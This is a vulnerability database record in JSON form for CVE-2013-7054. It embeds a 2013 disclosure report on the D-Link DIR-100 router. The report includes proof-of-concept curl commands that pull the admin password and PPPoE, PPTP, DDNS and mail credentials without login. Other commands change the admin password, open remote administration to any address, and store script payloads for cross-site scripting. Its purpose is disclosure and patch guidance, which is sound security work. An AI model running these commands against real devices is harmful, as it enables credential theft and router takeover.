var-202002-0669
Vulnerability from variot
D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0669",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 0.4
},
"cve": "CVE-2013-7054",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2013-7054",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-01478",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2013-7054",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2013-7054",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7054",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-7054",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-01478",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-035",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7054",
"trust": 3.4
},
{
"db": "BID",
"id": "65290",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01478",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"id": "VAR-202002-0669",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
}
]
},
"last_update_date": "2024-11-23T21:36:11.475000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "D-Link DIR-100 has multiple patches for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44084"
},
{
"title": "D-Link DIR-100 Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107307"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
},
{
"trust": 2.3,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.6,
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-035"
},
{
"date": "2020-02-04T14:15:12.340000",
"db": "NVD",
"id": "CVE-2013-7054"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01478"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007142"
},
{
"date": "2022-07-01T00:00:00",
